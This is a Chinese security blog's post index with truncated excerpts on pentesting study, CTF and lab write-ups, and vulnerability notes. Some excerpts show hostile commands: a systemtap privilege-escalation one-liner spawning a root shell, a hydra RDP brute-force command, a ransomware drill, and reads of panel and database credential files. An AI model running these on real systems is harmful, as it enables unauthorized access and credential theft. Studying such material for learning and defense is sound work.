自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(144)
  • 资源 (6)
  • 收藏
  • 关注

原创 web渗透之学习笔记

一、sqlmap-p 指定注入点–technique 指定注入类型B:Boolean-based blind(布尔型注入)E:Error-based(报错型注入)U:Union query-based(可联合查询注入)S:Stacked queries(可多语句查询注入)T:Time-based blind(基于时间延迟注入)Q:Inline queries(嵌套查询注入)oracle 默认的端bai口号是1521...

2020-10-15 14:23:05 231

原创 PHP函数笔记

htmlspecialchars():将特殊字符转换为html实体$str = htmlspecialchars(string,flags,character-set,double_encode);string:规定要转换的字符串;flags :可选参数,规定如何处理引号、无效的编码以及使用哪种文档类型;character-set:可选参数,规定了要使用的字符集的字符串,e.g.U...

2020-01-20 14:19:29 127

原创 MySQL密码忘记怎么办?

1、从网站配置文件上获取。2、修改密码检查MySQL服务是否启动,如果启动则关闭MySQL服务。修改MySQL的配置文件my.cnf在配置文件中,增加2行代码,作用是登录mysql的时候跳过密码验证[mysqld]skip-grant-tables然后启动mysql服务,并进入mysql连接mysql这个数据库,修改用户密码...

2021-10-25 15:50:47 22

原创 adb安装教程

一、安装1、下载地址:Windows 版本:https://dl.google.com/android/repository/platform-tools-latest-windows.zip Mac 版本:https://dl.google.com/android/repository/platform-tools-latest-darwin.zip Linux 版本:https://dl.google.com/android/repository/platform-tools-latest-

2021-10-20 11:33:13 74

原创 sublime配置中文模式

1、使用快捷键Shift+Ctrl+P,弹出查找栏2、安装installPackage Control3、然后出现如下报错4、查看报错信息,是因为我们访问不到报错信息当中的这个url,怀疑是因为该网址在国外的原因,切换科学上网,发现还是不行。最后不适用科学上网,修改C:\Windows\System32\drivers\etc\hosts文件,如下图,安装成功。5、继续安装6、输入chinese,安装成功...

2021-10-15 15:27:17 8

原创 陇剑杯之第九题WiFi之学习

题目描述网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木马来玩玩upload-labs,并且保存了内存镜像、wifi流量和服务器流量,让您来分析后作答:(本题仅1小问)答题要求小王往upload-labs上传木马后进行了cat /flag,flag内容为_____________。(压缩包里有解压密码的提示,需要额外添加花括号)开始解题1、解压题目给出的压缩包,发现一个镜像、两个流量包。2、根据题目分析,小王往服务器上传了后门文件,并且读取了flag文件,题目要去我们.

2021-09-29 16:41:37 35

原创 将谷歌插件打包给别人使用

因为一些原因,要讲自己的谷歌浏览器插件给别人使用,因此记录一下过程,万一后面又要使用了呢。1、在地址栏中输入:chrome://extensions/, 打开拓展程序2、复制扩展程序的ID号,如果没有,请开启开发者模式3、使用everything搜索该ID号。4、进去该文件夹下,记录下文件路径5、 打包扩展程序6、记录下路径7、 找到该crx文件8、开始进行测试,先删除原来的插件,记得先把crx文件移动到其他地方,不然就一起删除了。安装成功...

2021-09-28 19:35:05 160

原创 陇剑杯之第六题内存分析之学习

网管小王制作了一个虚拟机文件,让您来分析后作答:github上下载开元内存取证框架Volatilityhttps://github.com/volatilityfoundation/volatility3/releases/tag/v1.0.1使用imageinfo 获取系统信息。

2021-09-28 11:56:33 31

原创 宝塔面板学习

1、忘记宝塔安全入口bt default2、查看宝塔绑定的手机号码cat www/server/panel/data/userInfo.json3、查看数据库账号密码(需要MD5解密)cat ./www/server/data/mysql-bin.0000054、

2021-09-28 09:23:45 13

原创 kali2021.3安装教程

一、下载与校验1、官方下载bt种子https://www.kali.org/get-kali/#kali-bare-metal2、使用迅雷打开torrent文件进行下载,这样下载速度快。3、校验哈希值是否一致二、创建虚拟机4、开始创建点击进行自定义硬件在ISO映像文件中选择刚刚下载的kali的iso镜像。三、启动并安装...

2021-09-17 12:34:45 1862 4

原创 我爱做靶机之DC-6

下载安装运行虚拟靶机DC-6由于我给靶机设置的是nat模式,而我nat模式的网段是192.168.100.0/24,因此使用nmap扫描该网段,发现靶机使用IP。使用for 循环ping的方式发现靶机IP地址。for /L %I in (1,1,254) Do @ping -w 1 -n 1 192.168.100.%I | findstr "TTL="使用nmap扫描IP地址开放的端口。发现开放22端口和80端口,访问80端口。访问80端口失败,发现IP变成了域...

2021-09-15 09:11:39 23

原创 我们的七日战争

昨晚和女朋友吵架了,其实之前已经小吵小闹了很多次了,只是我的内心一直不愿意承认这是吵架,因为当初对她承诺过,再也不和她吵架了。没想到,只能说世事无常吧。然后看了一部动漫,其实这部动漫已经下载我电脑中好久了,甚至都下载了好几遍。因为工作的原因一直没有时间去看。昨晚无聊所致吧,也可能是吵架、生气,有压力的原因吧,点了一份又吃不完的外卖,看了这部动漫。其实在等待外卖的时候已经吃完了。。。故事是我想象中的故事,但有些情节出乎我的意料之外。俗套的青梅竹马,男孩一直暗暗喜欢着女孩,却一直不敢表白。终于有一天,女孩子

2021-07-19 11:08:22 53 1

原创 漏洞之XML实体注入

XXE——XML外部实体注入程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。XML是可扩展标记语言,很类型HTML语言。但是xml语言的标签没有预定义,需要自定义标签。XML 被设计用来结构化、存储以及传输信息。但是 XML 不会做任何事情。举个栗子:张三给李四写了一张便签,标题是提醒,内容是:李四,你不要忘记开会。<note><to>李四</to><from>张三</from><hea

2021-06-30 19:27:38 58

原创 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞 复现

fofa搜索相关资产:icon_hash="1085941792"访问首页如下:漏洞Url为/servlet/~ic/bsh.servlet.BshServlet命令执行:

2021-06-10 10:07:49 923

原创 CTF之流量分析

CTF杂项中存在一种题型——流量分析,主要是给你一个流量包,让你分析获取其中的flag的值。有5种方式,可以直接查找flag。1、直接搜索2、使用notepad++等软件,直接打开流量包,搜索关键字3、编写python脚本#encoding:utf-8#用二进制方式读取文件file=open("networking.pcap","rb")#读取文件内容i=file.read()#查找字段a1=i.find("flag{")a2=i.find("}",a1)#将查

2021-06-05 01:37:47 1353

原创 记一次失败的DOM型XSS挖掘

如果当时我们说了再见,后来是不是就可以再见。 ——《昨日青空》不知不觉换了新工作已经三个月了,这三个月从一开始反差极大造成的极度不适应到如今的渐渐适应,果然时间是最强大的工具,尽管这个工作依旧不那么适合我,但是我已经不那么反感了,人不能总待在舒适圈,经历的多了才会更强大,更有力量去保护自己想要保护的人。个人DOM型XSS挖掘方法:1,首先找到js输出的方式,有以下4种:使用window.alert()弹出警告框。 使用document.write()方法将内容写到 HTML 文...

2021-04-04 10:42:22 134

原创 扫描之xray被动扫描教程

主动扫描:使用AWVS、appscan、nessus上配置网站域名或者IP,然后就不管了,扫描器会自动完成后续的爬取连接、验证漏洞的过程。被动扫描:结合burp,手工浏览网站,将你觉得有可能存在漏洞的数据包或连接发送给扫描器进行扫描。工具准备:burp插件passive-scan-client、xrayburp插件passive-scan-client作用:将访问网站的流量和提交给扫描器的流量分开。下载地址:https://github.com/c0ny1/passive-scan-cl

2021-04-03 09:33:47 1816

原创 代码审计之rips之bluecms审计

rips是一款代码审计工具,下载下来并放在网站跟目录就可以了,然后直接通过浏览器访问,很简单,傻瓜式的使用。代码审计:https://nchc.dl.sourceforge.net/project/rips-scanner/rips-0.55.zip使用phpstudy搭建你要审计的网站bluecms。将rips解压放在网站根目录,然后使用浏览器访问。输入网站路径进行代码审计。一个一个的来看,先审计ad_js.php文件。存在sql注入漏洞:1,get方式传入了ad_id

2021-03-12 20:38:49 156

原创 APP之抓包

burp抓不到APP数据包的两个情况:1,SSL Pinning(又叫“ssl证书绑定“),客户端在收到服务器的证书后,对该证书进行强校验,验证该证书是不是客户端承认的证书,如果不是,则直接断开连接。ssl pinning是将服务端证书直接内置在APP当中,当APP与服务端建立连接期间,收到服务器证书后,先用内置的证书校验服务器证书是否合法,不合法就断开。使用Xposed + JustTruestMe绕过SSL pinning1,下载逍遥模拟器,配置低版本的安卓模拟器2,下载xposed

2021-03-12 18:49:21 166

原创 kindeditor编辑器文件上传漏洞

kindeditor编辑器版本小于4.1.5存在文件上传漏洞,可利用该漏洞上次网页、文本文件,可网站进行篡改,添加赌博、反共等违法信息。通过扫描器发现该网站存在编辑器。通过浏览器访问,确定该编辑器为kindeditor编辑器。确定该编辑器的版本小于4.1.5,存在文件上传漏洞。构造文件上传漏洞利用脚本kindeditor.html。<html><head> <title>Uploader</title> <s

2021-03-12 18:31:06 439

原创 APP之反编译

1.首先将APP安装包的后缀名改成.zip,然后再解压,得到以下文件。2.使用反编译工具dex2jar-2.0对classes.dex文件进行反编译。3.利用以下工具打开反编译后的文件以上用到的所有工具都可以从GitHub上搜索下载。...

2021-03-12 18:23:11 257

原创 S2-045之不能再当脚本小子之格物致知之知行合一

发现奇怪告警Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Type: {\u0028\u0023\u006e\u0069\u006b\u0065\u003d\u0027multipart/form-data\u0027\u0029\u002e\u0028\u0023\u0064\u006d\u003d\u0040\u006f\u0067\u006e\u006c\u002e\u004f\u0067\u006e\u

2021-03-05 01:09:54 195 2

原创 Linux系统webshell查杀

测试是否能通外网。查看操作系统下载webshell查杀工具河马下载64位版本 wget -O hm-linux.tgz http://down.shellpub.com/hm/latest/hm-linux-amd64.tgz?version=1.6.0下载32位版本 wget -O hm-linux.tgz http://down.shellpub.com/hm/latest/hm-linux-386.tgz?version=1.6.0解压找网站路径find /

2021-03-03 00:37:34 253

原创 Charles抓取APP数据包

简介Charles 是在 PC 端常用的网络封包截取工具,在做开发时,我们为了调试与服务器端的网络通讯协议,常常需要截取网络封包来分析。除了调试端口外,Charles 也可以用于分析第三方应用的通讯协议。配合 Charles 的 SSL 功能,Charles 还可以分析 Https 协议。Charles 通过将自己设置成系统的网络访问代理服务器,使得所有的网络访问请求都通过它来完成,从而实现了网络封包的截取和分析,也就是抓包啦。Charles 主要的功能包括: 截取 Http 和 Http

2021-03-01 23:51:41 113

原创 JSFinder使用方法

JSFinderJSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。下载地址:https://github.com/Threezh1/JSFinder使用方法:1,解压后通过python3使用;2,简单爬取python JSFinder.py -u http://www.mi.com3,深度爬取python JSFinder.py -u http://www.mi.com -dpython JSFinder.py -u http://w

2021-01-27 15:17:19 2508

原创 勒索病毒应急演练

扫描目标机开放端口,发现开启445和3389端口。测试445端口是否存在永恒之蓝漏洞,发现存在ms17010漏洞,日后再打。测试3389远程桌面是否存在弱口令,得到账号密码。hydra -v -f -t 2 -w 2 -l Administrator -P E:\tools\git\Rdpscan\pass.txt rdp://192.168.5.128利用得到的账号密码远程进行登录,并进行勒索病毒投放。双击运行病毒,对该台服务器进行文件加密、勒索等操作。攻击者到

2021-01-19 20:12:09 801 2

原创 记一次对任意下载文章的学习

原文地址:https://mp.weixin.qq.com/s/Nbbe23hIcnKakSbkQzlw1w查看下载功能点url:漏洞思路1:先访问下载的文件url是否在网站目录如是可尝试使用iis默认配置的web.config作为尝试/get/?d=now&f=/web.config(发现该网站的中间件是IIS,因此尝试下载web.config配置文件)(可以测试是否存在robots.txt和favicon.ico,index.php文件,用于测试否存在任意文件下载

2020-12-31 14:48:50 35

原创 配置submit运行php

1,下载phphttps://www.php.net/选择windows版本下载:选择适合自己的版本:线程安全适合apache,非线程安全适合IIS将下载下来的压缩包进行重命名解压将php.ini-development复制一份重命名成php.ini添加用户变量submit添加编译系统...

2020-12-30 19:00:23 210 2

原创 PHP之绕过disable_function

disable_functions为了服务器的安全,我们可以设置PHP禁止运行一些危险的函数。设置方法将需要禁止运行的函数写入到php.ini当中的disable_functions中。phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,sys

2020-12-02 17:32:05 666

原创 服务器请求伪造(SSRF漏洞)

SSRF漏洞简介SSRF是由攻击者构造请求,服务器发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统。(正因为请求是由服务器发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。SSRF漏洞原理大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址进行过滤与限制。SSRF漏洞源码<?php function curl($url){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$url

2020-12-02 17:03:49 514

原创 工具之使用教程Neo-reGeorg

Neo-reGeorg是常见的http正向隧道工具,是reGeorg工具的升级版。增加了很多特性,例如像内容加密、避免被检测、请求头定制、响应码定制、支持py3等等reGeorg:1,在aspx和jsp环境下可以正常使用 2,php环境中tunnel.php文件要依赖dl("php_sockets.dll");通过dl函数加载扩展,这种方式局限性很大,很多环境下都不支持dl函数。 3,tunnel.nosocket.php文件虽然可以不依赖dl函数,但是使用了flush()这个函数,部分PHP环

2020-11-30 16:14:31 3123

原创 php反序列化之Phar反序列化漏洞

之前写的两篇文章都太理想化,真实的代码谁写成$data = unserialize($_POST['a']),直接让你反序列化,在实际的PHP程序中,主要是反序列化链(pop链),如thinkphp、Laravel的反序列化链的漏洞和利用phar://伪协议完成反序列化漏洞。今天就来学习一个phar文件序列化漏洞。pharphar是一个合成词,由PHP 和 Archive构成,可以看出它是php归档文件的意思。一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的

2020-11-30 15:22:04 580 2

原创 PHP反序列化之练习题

pikachu平台反序列化漏洞第一题:反序列化漏洞输出XSS地址:https://www.bihuoedu.com/vul/unserilization/unser.php查看unser.php文件的源码:<?phpclass S{ var $test = "pikachu"; function __construct(){ echo $this->test; }}//O:1:"S":1:{s:4:"test";s:29:"&.

2020-11-29 22:17:45 391

原创 PHP反序列化之基础

序列化序列化是将对象转换成字符串。但仅保留对象里的成员变量,不保留函数方法。将对象序列化有利于对象的保存和传输,也可以让多个文件共享对象。反序列化反序列化是将字符串恢复成对象。PHP的序列化实现源码:<?php class person{ public $name='zhangsan'; public $sex='boy'; public $age='18';}$zhangsan=new person();$str=serialize($zhangsan);e

2020-11-29 17:31:54 372 1

原创 PHP之如何绕过open_basedir

open_basedirphp.ini中原文的说明是:; open_basedir, if set, limits all file operations to the defined directory; and below. This directive makes most sense if used in a per-directory or; per-virtualhost web server configuration file. This directive is; *N...

2020-11-27 19:54:05 421

原创 PHP伪协议之文件包含漏洞分析利用

allow_url_fopen = On && allow_url_include = Off 此时才可以触发本地文件包含漏洞allow_url_fopen = On && allow_url_include = On 此时才可以触发远程文件包含漏洞allow_url_fopen一直都是默认开启的,而allow_url_include从PHP5.2之后就是默认关闭的了include() 产生一个警告而 require() 则导致一个致命错误...

2020-11-27 16:11:58 1746

原创 提权

linux系统1,systemtap本地提权漏洞利用代码:[music@linuxso.com ~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whateversh-3.2#或者:printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C explo

2020-11-26 14:25:15 49

原创 PHP之各种SQL注入源码

数据库设置:union注入源码:<?php $con=mysqli_connect("localhost","root","root");mysqli_select_db($con,'sql');if (mysqli_connect_errno()){ echo "数据库连接出错:".mysql_connect_error();}$id=$_GET["id"];$result=mysqli_query($con,"select * from users where id=

2020-11-20 14:59:47 1018

原创 sql注入之宽字节注入

利用场景:1,网站对客户端输入的引号等字符进行了转义2,网站数据库采用了gbk编码代码分析:<?php//header("Content-Type: text/html; charset=gb2312");$id=isset($_GET['id'])?addslashes($_GET['id']):11;//使用addslashes()对参数$id进行了过滤$con=mysqli_connect('localhost','root','root');mysqli_select

2020-11-19 16:57:26 70

原创 PHP之PDO数据库抽象类库

随着php的快速发展与应用,php需要支持mysql,mssql,oracle等多种数据库,这个时候就需要一个跨数据库平台的统一接口。于是就有了“数据库抽象层”,把数据库连接与数据处理业务区分开,不管是什么数据库,都可以使用一样的接口。PDO的安装PDO类库是PHP自带的库,只需要把php.ini中的相关注释符号去掉。extension=php_pdo.dll extension=php_mysql.dllextension=php_mssql.dll使用PDO操作MySQL...

2020-11-18 17:18:11 59

CISP-PTE白皮书

CISP-PTE认证考试白皮书,打算考这个认证的可以看一下

2018-08-08

CISP-PTE知识体系大纲

cisp-pte考试所需的知识体系,可以和白皮书一起研究。

2018-08-08

dirsearch-master.rar

一款很好用的网站目录扫描器,内含中文使用手册,使用简单,可以很方便的扫描网站的目录、后台、数据库备份文件、配置文件、敏感文件,实属渗透测试的利器,我经常使用。

2019-11-27

通达OA前台伪造管理登陆cookie生成tongda.py

通达OA 前台伪造管理员登陆漏洞的cookie生成脚本,可以用以生成PHPsessionid,然后替换cookie,从而登陆通达OA后台。

2020-05-07

绕过token脚本

该脚本是用来绕过user_token的,是用PHP写的,可以用在爆破也可以用在其他方面

2018-08-14

EXIF-Viewer_v2.4.2.rar

chrome浏览器插件,可用于查看图片的exif信息,可以用于复现XSS漏洞,真的特别好用,附安装方法,请到我的博客查看,chrome插件的安装方法。

2020-03-12

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除